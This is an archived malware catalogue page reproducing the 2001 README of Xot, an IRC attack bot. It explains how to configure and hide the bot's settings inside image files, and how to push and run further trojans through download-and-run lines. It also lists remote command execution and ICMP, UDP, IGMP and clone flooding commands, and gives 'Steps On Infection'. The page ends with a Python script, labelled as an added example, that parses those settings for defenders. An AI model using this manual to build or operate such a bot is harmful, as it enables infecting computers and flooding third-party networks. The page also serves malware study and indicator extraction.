Xot
Released 23 years, 6 months ago. July 2001
Copyright © MegaSecurity
By XenoZ
Information
Author | XenoZ |
Family | Xot |
Category | Remote Access |
Version | Xot |
Released Date | Jul 2001, 23 years, 6 months ago. |
Additional Information
Server:
dropped file:
C:\WINDOWS\MTask32.exe
size: 172.111 bytes
startup:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Author Information / Description
__ __ _ ___ ____
\ \/ / ___ | |_ __ __ / _ \ | ___|
\ / / _ \ | __|\ \ / /| | | | |___ \
/ \ | (_) || |_ \ V / | |_| | _ ___) |
/_/\_\ \___/ \__| \_/ \___/ (_)|____/
By: XenoZ
Xot v0.5 Beta 2 By: XenoZ
Well here it is, my first open beta version of my irc bot Xot.
This bot has a ton of goodies for you script kiddies to play with.
But let me warn you Xot is not a friendly channel bot.
Xot is an attack bot and can possibly cause a lot of damage if one chose to do so.
So basically I'm not to blame if you successfully take down yahoo.com somehow.
Xot has a main feature which I call DRSS (Dynamic Remote Settings Stub).
DRSS is basically important bot settings that are appended at the end
of any file you wish to append it to, like a .JPG file or a .GIF file.
This file that has the settings is then uploaded to a webspace you specify
on EditServer, and when the server.exe file gets executed on the victim's computer,
Xot downloads the settings file periodically at a set interval
(interval also specified in EditServer) and Xot syncs the settings in.
The major benefit of this feature is that you can change the IRC server
or channel which your bots idle on _Very_ easily.
The DRSS file is configured in the format of ircd.conf
(if you're not familiar with ircd.conf, it uses different letter lines like O:lines).
When you enter the DRSS file maker program, once you type the letter of the
line you want it will show the parameters to that line.
Configuration Lines:
O-lines:
O-lines are the lines that add the userinfo on users that use your bot.
You can have multiple O-lines and all parameters for the O-line except for
password are allowed to use wildcards.
Format: O:<host>:<ident>:<nick>:<password>
Example: O:*.home.com:S*X:Xen*:mindrapist
I-lines:
I-lines are the lines that add the botinfo for the irc server that the bot uses,
nickname username realname...
Format: I:<prefix>:<nick>:<ident>:<realname>:<email>:<username>
Example: I:@:XenBot:Xenny:W3 0wn j00:[email protected]:Xot
S-lines:
S-lines specify the server, server port and password that the bots will idle on.
If there is no password, leave the 3rd parameter blank but keep the colon (for parsing reasons).
Format: S:<server>:<port>:<password>
Example: S:irc.lcirc.net:6667:
C-lines:
C-lines specify the channel and channel key the bot uses when it connects to the IRC server.
If there is no key, leave the 2nd parameter blank but keep the colon (for parsing reasons).
Format: C:<channel>:<key>
Example: C:#mindrape:DrUgScArE
E-lines:
Here's a nifty little feature that Overlord_45 gave me the idea for.
Why not add client-to-bot encryption to keep those bot stealers and spyers away?
This line gives the bot encryption for communication.
The E-line specifies the encryption key and the name of the DLL file on
your webspace which has the encryption routines.
(I included a DLL and mIRC script in the project for this feature.)
Thanks to Overlord_45 for this idea. Thanks to say-tan and Quension and
the rest of the RCforge crew for the encryption resources, and thanks
to Sarin for the script modifications.
The first parameter is your encryption key and the second parameter is
the name of the dll (submitted in this package) that is in the _SAME_ directory as your DRSS file.
Format: E:<encryption key>:<DLL name>
Example: E:MyPersonalKey:Xot.dll
N-lines:
N-lines give you the chance to submit a nicklist on your webspace for
the bot to download and use to randomly pick a nickname and ident. The file
data must have nicknames separated with a comma.
No Line Breaks! ... also there is no need to add numbers at the end of
nick names in the nick list because when the bot randomly chooses a
nickname it tacks on a random 2 digit number at the end.
The First and only parameter is the name of the nicklist on the
_SAME_ webspace directory as your DRSS file. (a sample nicklist has been given in the package)
Format: N:<name list source NOT A URL>
Example: N:nicklist.txt
U-lines:
U-lines give you the chance to upload and run a program onto your bots.
This feature is good for updating your bots or just adding a new trojan onto the computer.
The first parameter is the URL of the file (you can give it any name, any extension),
the second parameter is what you want the file to be renamed to on download
(some webspace providers don't accept EXE files, so this feature is
for that reason: give the exe file a JPG extension and the second parameter changes it back on download), and the third parameter is 1 or 0, 1 being run on download and 0 being no run on download.
WARNING: make sure the file doesn't melt on execution, otherwise the bot will keep downloading it.
Format: U:<url without http>:<filename on computer>:<1 or 0>
Example: U:my.server.here/server.jpg:server.exe:1
D-lines:
D-lines take the startup info out and shut down the bot.
PASSWORD is password on Server.exe for EditServer.exe
IRC Bot commands: (I'm using "!" as an example prefix)
!say <channel/user> <text to say> - makes the bot say something
!op <channel> <user> - makes the bot op someone
!deop <channel> <user> - makes the bot deop someone
!ban <channel> <hostmask> - makes the bot ban someone
!unban <channel> <hostmask> - makes the bot unban someone
!voice <channel> <user> - makes the bot voice someone
!devoice <channel> <user> - makes the bot devoice someone
!notice <channel/user> <text to say> - makes the bot send a notice
!action <channel/user> <text to say> - makes the bot do an action
!ctcp <channel/user> <ctcp command> - makes the bot ctcp someone
!nick <nickname> - makes the bot change its nickname
!raw <raw IRC command> - makes the bot do a RAW irc command
!id - makes the bot display its tag
!sync - makes the bot resync its DRSS file
!login <password> - logs into the bot
!exec <hide or show> <commandline> - executes a commandline
!ping <address> <packetsize> <times> - ICMP attack
!udp <ip> <packet size> <times> - UDP attack
!igmp <address> <packetsize> <times> <interval> - IGMP attack
!clone <server> <port> <# of clones> - clone attack
!cloneraw <raw IRC command> - send a raw IRC command to the clones
!clonekill - kills all clones
!info - gives computer info of the computer that the bot is on
!botinfo - gives bot version and such
Encryption -
This package comes with an mIRC script and a DLL for the encryption routines. If you want your bot to communicate encrypted, add your E:line with the first parameter as the key and the second parameter as the name of the DLL file (Xot.dll), then upload the DLL file and upload the new DRSS settings. Then in your mIRC client put Xot.ini and Xot.dll in your mIRC folder and do this in mIRC status:
/load -rs Xot.ini
Then get on your channel and right-click the channel window and there should be a Xot submenu. Same thing with queries.
NOTE: XOT.INI ONLY WORKS WITH mIRC 5.9+
Editserver.exe -
This is where we configure the SERVER.exe file to recognize the webspace which the DRSS file is in.
File Location - the exact website url for your DRSS file
Interval in Min - the interval between DRSS updates
Password - password to read EditServer settings
ID tag - add your own little tag to know whose bots they are, or whatever you want in there.
No Read - this just means if on read should the EditServer read the already appended info or just append more info. (advanced) Don't use it unless you know what you're doing.
DRSS Config -
This is where you make your DRSS file. You can append it to anything, but I would use a GIF file because they are small, or you can use a blank txt file. It doesn't matter.
The buttons in DRSS config are self-explanatory. In the memobox all you have to do is type out the letter of the line you want and the parameters will automatically appear.
Steps On Infection...
1. configure your Server.exe via Editserver.exe
2. Make your DRSS file and Upload it to your specified webspace in Editserver
3. Start infecting
Other shit-
Xot Team:
Programmer: XenoZ
Head Beta Tester/ideas for Development : Overlord_45
mIRC Script Creator/ideas/beta tester : Sarin
I just wanna give shoutouts to everyone at LCIRC (irc.lcirc.net), NetbioM, Overlord_45 , Sarin, DataSpy (good luck on your bot), Ritual33, ZenDraL and the rest of the Drugscare Crew (who infected like more than half of the cable IP range =P ) , RaYmAn (thanks for teachin me the raw UDP.. but i used TNMUDP =P ) , SilenceGold, Ganja51, narf, CyberFly, evilgoat and slim (good luck on your bots),Gwen and anyone else i missed.
P.S. This Version Is Dedicated To Rob And Is Released On His Birthday.. Happy Birthday Rob. -XenoZ and NetbioM
Well that's it for the Beta 2 release...
Expect more goodies in Beta 3 =D
-XenoZ
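For defenders triaging a suspicious image or text file, the DRSS line formats documented in the README above can be matched in the tail of the file to recover the IRC server, channel and download indicators. The Python below is an added example, not part of the original README or of Xot; it assumes the settings are stored as plain ASCII lines after the carrier data, which the page does not confirm, and its function names are hypothetical.

```python
import re

# Field counts per line letter, from the "Format:" lines in the README.
# D-lines have no documented format there, so they are matched, not validated.
FIELDS = {"O": 4, "I": 6, "S": 3, "C": 2, "E": 2, "N": 1, "U": 3}

# ASSUMPTION: settings are plain ASCII lines appended after the carrier bytes.
LINE_RE = re.compile(rb"(?m)(?<![A-Za-z0-9])([OISCENUD]):([\x20-\x7e]*)\r?$")

# Constructed sample: a GIF-like carrier followed by example lines from the README.
SAMPLE = (b"GIF89a\x01\x00\x01\x00\x00\x00\x00;"
          b"S:irc.lcirc.net:6667:\r\n"
          b"C:#mindrape:DrUgScArE\r\n"
          b"U:my.server.here/server.jpg:server.exe:1\r\n")

def find_drss_lines(blob, tail=4096):
    """Return (letter, fields) for DRSS-style lines found in the file tail."""
    hits = []
    for m in LINE_RE.finditer(blob[-tail:]):
        letter = m.group(1).decode()
        fields = m.group(2).decode().split(":")
        want = FIELDS.get(letter)
        # Keep the line only if its field count matches the documented format.
        if want is None or len(fields) == want:
            hits.append((letter, fields))
    return hits

def looks_like_drss(hits):
    """A usable settings stub needs at least a server and a channel line."""
    return {"S", "C"} <= {letter for letter, _ in hits}

def indicators(hits):
    """Collect the network indicators an analyst would block or hunt on."""
    out = {"irc": [], "channels": [], "downloads": []}
    for letter, f in hits:
        if letter == "S" and f[1].isdigit():
            out["irc"].append((f[0], int(f[1])))
        elif letter == "C":
            out["channels"].append(f[0])
        elif letter == "U":
            # (source URL without scheme, name on disk, run-on-download flag)
            out["downloads"].append((f[0], f[1], f[2] == "1"))
    return out

if __name__ == "__main__":
    found = find_drss_lines(SAMPLE)
    print(looks_like_drss(found), indicators(found))
```
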